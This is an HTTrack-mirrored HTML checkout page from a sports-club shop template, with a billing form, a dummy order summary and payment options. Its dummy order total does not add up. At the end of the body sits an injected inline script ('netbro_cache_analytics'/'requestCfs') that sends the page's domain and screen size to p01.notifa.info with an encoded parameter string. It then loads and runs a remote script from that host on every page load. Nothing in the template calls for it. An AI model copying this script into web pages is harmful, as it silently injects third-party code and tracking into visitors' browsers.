<!doctype html>
<html class="no-js" lang="en">

<!-- Mirrored from preview.hasthemes.com/suparsport-preview/suparsport/checkout.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 13 Oct 2019 12:44:42 GMT -->
<head>
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <title>Checkout - SuperSport</title>
    <meta name="description" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- Favicon -->
    <link rel="shortcut icon" type="image/x-icon" href="img/favicon.ico">
    <!-- Fonts -->
    <link rel="stylesheet" href="css/montserrat.css">
    <!-- CSS -->
    <!-- Bootstrap CSS
	============================================ -->
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <!-- Icon Font CSS
	============================================ -->
    <link rel="stylesheet" href="css/material-design-iconic-font.min.css">
    <link rel="stylesheet" href="css/font-awesome.min.css">
    <!-- Plugins CSS
	============================================ -->
    <link rel="stylesheet" href="css/plugins.css">
    <!-- Style CSS
	============================================ -->
    <link rel="stylesheet" href="style.css">
    <!-- Modernizer JS
	============================================ -->
    <script src="js/vendor/modernizr-2.8.3.min.js"></script>
</head>

<body>
<!-- Body main wrapper start -->
<div class="wrapper fix">

<!-- Header Area Start -->
<div id="header-area" class="header-area section">
    <div class="container">
        <div class="row">
            <div class="col-xs-12">
                <!-- Logo -->
                <a class="logo float-left" href="index.html"><img src="img/logo.png" alt=""></a>
                <!-- Mini Cart -->
                <div class="mini-cart float-right">
                    <a href="#"><i class="zmdi zmdi-shopping-basket"></i></a>
                </div>
                <!---- Menu ---->
                <div id="main-menu" class="main-menu float-right">
                    <nav>
                        <ul>
                            <li><a href="index.html">home</a></li>
                            <li><a href="about.html">about</a></li>
                            <li><a href="team.html">team</a></li>
                            <li><a href="fixture.html">fixture</a></li>
                            <li><a href="point-table.html">point table</a></li>
                            <li><a href="blog.html">blog</a>
                                <ul>
                                    <li><a href="blog.html">blog</a></li>
                                    <li><a href="blog-details.html">blog details</a></li>
                                </ul>
                            </li>
                            <li class="active"><a href="shop.html">shop</a>
                                <ul>
                                    <li><a href="shop.html">shop</a></li>
                                    <li><a href="product-details.html">product details</a></li>
                                    <li><a href="cart.html">cart</a></li>
                                    <li><a href="wishlist.html">wishlist</a></li>
                                    <li><a href="checkout.html">checkout</a></li>
                                </ul>
                            </li>
                            <li><a href="contact.html">contact</a></li>
                        </ul>
                    </nav>
                </div>
                <!---- Mobile Menu ---->
                <div class="mobile-menu"></div>
            </div>
        </div>
    </div>
</div>
<!-- Header Area End -->

<!-- Page Banner Area Start -->
<div id="page-banner-area" class="page-banner-area section">
    <div class="container">
        <div class="row">
            <div class="page-banner-title text-center col-xs-12">
                <h2>checkout</h2>
            </div>
        </div>
    </div>
</div>
<!-- Page Banner Area End -->

<!-- Checkout Area Start -->
<div class="checkout-area section pb-70 pt-120">
	<div class="container">
		<div class="row">
			<div class="col-md-6 col-xs-12 mb-50">
			    <!-- Billing Details -->
				<div class="billing-details">
					<h4>billing details</h4>
					<form action="#">
						<input type="text" placeholder="Your Name" />
						<input type="text" placeholder="Enter Your Here" />
						<input type="text" placeholder="Phone Here" />
						<input type="text" placeholder="Company Name Here" />
						<input type="text" placeholder="Country" />
						<input type="text" placeholder="State" />
						<input type="text" placeholder="Town / City" />
						<textarea placeholder="Type Your Message"></textarea>
					</form>
				</div>
			</div>
			<div class="col-md-6 col-xs-12 mb-50">
			    <!-- Order Payment -->
				<div class="order-payment">
					<h4>your order</h4>
					<ul>
						<li><span class="name">Dummy Product Name  x 2</span><span class="price">$86.00</span></li>
						<li><span class="name">Dummy Product Name  x 1</span><span class="price">$69.00</span></li>
						<li><span class="name">Cart Subtotal</span><span class="price">$155.00</span></li>
						<li><span class="name">Shipping and Handing</span><span class="price">$15.00</span></li>
						<li><span class="name">Vat</span><span class="price">$00.00</span></li>
						<li><span class="name">Order Total</span><span class="price">$325.00</span></li>
					</ul>
					<h4>payment method</h4>
					<div class="panel-group" id="payment-accordion">
						<div class="panel panel-default">
							<h4 class="panel-title bg-white"><a data-toggle="collapse" data-parent="#payment-accordion" href="#payment-1">direct bank transfer</a></h4>
							<div id="payment-1" class="panel-collapse collapse in">
								<div class="panel-body">
									<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>
								</div>
							</div>
						</div>
						<div class="panel panel-default">
							<h4 class="panel-title bg-white"><a class="collapsed" data-toggle="collapse" data-parent="#payment-accordion" href="#payment-2">cheque payment</a></h4>
							<div id="payment-2" class="panel-collapse collapse">
								<div class="panel-body">
									<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>
								</div>
							</div>
						</div>
						<div class="panel panel-default">
							<h4 class="panel-title bg-white"><a class="collapsed" data-toggle="collapse" data-parent="#payment-accordion" href="#payment-3">paypal</a></h4>
							<div id="payment-3" class="panel-collapse collapse">
								<div class="panel-body">
									<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>
								</div>
							</div>
						</div>
					</div>
					<button class="place-order">place order</button>
				</div>
			</div>
		</div>
	</div>
</div>
<!-- Checkout Area End -->

<!-- Breaking News Area Start -->
<div class="breaking-news-area section overlay pb-40 pt-40">
    <div class="container">
        <div class="row">
            <!-- Breaking News Wrapper -->
            <div class="news-wrapper col-xs-12">
                <h4>Breaking News :</h4>
                <!-- Breaking News Slider -->
                <div class="bnews-slider">
                    <a href="#">There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration.</a>
                    <a href="#">There are many variations of passages of Lorem Ipsum available.</a>
                    <a href="#">There are many variations of passages of Lorem Ipsum available, but the majority.</a>
                </div>
            </div>
        </div>
    </div>
</div>
<!-- Breaking News Area End -->

<!-- Footer Top Area Start -->
<div class="footer-top-area section pb-70 pt-100">
   <div class="footer-top-left-bg overlay"></div>
    <div class="container">
        <div class="row">
            <!-- Footer About -->
            <div class="col-md-5 col-xs-12 mb-30">
                <div class="footer-about">
                    <img src="img/logo.png" alt="">
                    <p>Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proiden</p>
                    <div class="social fix">
                        <a href="#"><i class="fa fa-facebook"></i></a>
                        <a href="#"><i class="fa fa-rss"></i></a>
                        <a href="#"><i class="fa fa-google-plus"></i></a>
                        <a href="#"><i class="fa fa-pinterest"></i></a>
                        <a href="#"><i class="fa fa-instagram"></i></a>
                    </div>
                </div>
            </div>
            <!-- Footer Twitter -->
            <div class="col-md-4 col-sm-6 col-xs-12 mb-30">
                <div class="twitter-widget">
                    <h3 class="title">Latest Tweets</h3>
                    <div class="single-twite">
                        <p>Duis aute irure <a href="#">@dolor</a> in rderiin voluptate velit esse cillum dolore eu ft nulla pariatur. Excepteur <a href="#">@sint</a> occaecat..</p>
                        <span>30 minutes ago</span>
                    </div>
                    <div class="single-twite">
                        <p>Duis aute irure <a href="#">@dolor</a> in rderiin voluptate velit esse cillum dolore eu ft </p>
                        <span>15 minutes ago</span>
                    </div>
                </div>
            </div>
            <!-- Footer Subscribe -->
            <div class="col-md-3 col-sm-6 col-xs-12 mb-30">
                <div class="subscribe-widget">
                    <h3 class="title">Newsletters</h3>
                    <div class="subscribe-form">
                        <form action="#">
                            <input type="text" placeholder="your email address">
                            <button class="submit"><i class="zmdi zmdi-mail-send"></i></button>
                        </form>
                    </div>
                    <p><span>Phone:</span> +98 996 554 658</p>
                    <p><span>email:</span> sport@email.com</p>
                </div>
            </div>
            
        </div>
    </div>
</div>
<!-- Footer Top Area End -->

<!-- Footer Bottom Area Start -->
<div class="footer-bottom-area section">
    <div class="container">
        <div class="row">
           
            <!-- Copyright -->
            <div class="copyright text-left col-sm-6 col-xs-12">
                <p>Copyright &copy; <span>Supar Sport</span>. 2016.All right reserved</p>
            </div>
            <!-- Author Credit -->
            <div class="author-credit text-right col-sm-6 col-xs-12">
                <p>Created by <a href="https://hastech.company/">Hastech</a> With <i class="fa fa-heart-o"></i></p>
            </div>
            
        </div>
    </div>
</div>
<!-- Footer Bottom Area End -->


</div>
<!-- Body main wrapper end -->

<!-- JS -->

<!-- jQuery JS
============================================ -->
<script src="js/vendor/jquery-1.12.0.min.js"></script>
<!-- Bootstrap JS
============================================ -->
<script src="js/bootstrap.min.js"></script>
<!-- Plugins JS
============================================ -->
<script src="js/plugins.js"></script>
<!-- Ajax Mail JS
============================================ -->
<script src="js/ajax-mail.js"></script>
<!-- Main JS
============================================ -->
<script src="js/main.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582Am8lISurprAuN%2b5wL0gfuXdMidy8fxDv3toH772TTw0763T8hNr8taRC0aL59o0B6oYWe6PhQ2Lyt7dT79Y5LCzP2eN5QUBUCFwES%2f3weApiLFcAMYirWnS089eOXkgVvqXPbJpW7aVMGF%2bPLe6BpjiJJikbNlrcpy3IN7rlbUuoOKyVVBph6U95ygihNDfU0aqOiCNATHtKplPvq3HoIBUI1LsA9%2ffeU5lhznFewHY4J6BhR07o6LPjN3NuLLIcNCMdgTqCcMaZxckaPIqhePcYpN1qsVH9PmFfCLpl9VF9LbgdqnbDgzURam4%2bkzlxpEJhvJckS9UD4MYpV6ea9YM6K7G70wUu%2fybC4D2krWgktzQcXtos182WLR7LqzGpACPG4QcteF3Ao%2fkUQkEAgsjr8FSbHt%2bxF%2fPtyIKleafXvLnVvgZPP63nRNm4zTp4GF1AKkTE7uc%2frBLtNvOXpqeKfBz2NdSoMaROPlVBIomywq8n%2fLic8UE3Kju%2fz340Gv8hsz%2fZQCB4nrMwJoWr4Uze4TH8XNNGw%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>


<!-- Mirrored from preview.hasthemes.com/suparsport-preview/suparsport/checkout.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 13 Oct 2019 12:44:42 GMT -->
</html>